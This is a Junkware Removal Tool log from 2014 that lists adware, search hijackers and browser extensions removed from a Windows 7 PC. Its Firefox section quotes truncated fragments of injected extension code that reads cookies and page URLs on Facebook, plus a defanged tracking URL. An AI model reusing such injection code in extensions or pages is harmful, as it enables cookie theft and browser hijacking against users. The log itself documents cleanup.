~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Thisisu Version: 6.1.1 (02.04.2014:1) OS: Windows Se7en Titan x86 Ran by ZAHOUI on 16/02/2014 at 16:26:02,98 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Services Successfully stopped: [Service] hshld Successfully deleted: [Service] hshld Successfully stopped: [Service] hsstrayservice Successfully deleted: [Service] hsstrayservice Failed to stop: [Service] hsswd ~~~ Registry Values Successfully deleted: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\livesupport ~~~ Registry Keys Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\smarttweak Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2134588498-3345777639-1277487948-1000\Software\sweetim Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\hotspotshield Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\livesupport_rasapi32 Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\livesupport_rasmancs Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\optprostart_rasapi32 Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\optprostart_rasmancs Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11111111-1111-1111-1111-110011441179} Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11111111-1111-1111-1111-110011441179} Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11111111-1111-1111-1111-110011441179} Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{11111111-1111-1111-1111-110011441179} Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{68A4DF86-69E6-4C87-BCFF-0243AD92E971} Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{7981C3EC-C12C-424a-85CE-73F80C25ADEE} ~~~ Files ~~~ Folders Successfully deleted: [Folder] "C:\ProgramData\hotspot shield" Successfully deleted: [Folder] "C:\ProgramData\youtubeadblocker" Successfully deleted: [Folder] "C:\Users\ZAHOUI\appdata\local\cre" Failed to delete: [Folder] "C:\Program Files\hotspot shield" Successfully deleted: [Folder] "C:\Program Files\youtubeadblocker" Successfully deleted: [Folder] "C:\Users\ZAHOUI\start menu\programs\browser manager" ~~~ FireFox Successfully deleted the following from C:\Users\ZAHOUI\AppData\Roaming\mozilla\firefox\profiles\124tk0rb.default-1383038749522\prefs.js user_pref("extensions.4O0EGW1MQj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000 user_pref("extensions.EbMFOHOSS.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp000008 user_pref("extensions.EbMFOHOSS.url", "hxxp://toolkitfun.info/sync2/?q=hfZ9ofV9CShEAen0qHs9tMqLDe49CNU0n9UMCMlNhd9FqdaGrjrGrTwGrdkMBzqUojw9rdsFqTw7rdgHrGh7hfs0pihPBMn0qdrHqjw7 user_pref("extensions.QGdb.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\") user_pref("extensions.zuOL.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\") Emptied folder: C:\Users\ZAHOUI\AppData\Roaming\mozilla\firefox\profiles\124tk0rb.default-1383038749522\minidumps [59 files] ~~~ Event Viewer Logs were cleared ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on 16/02/2014 at 16:30:54,67 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~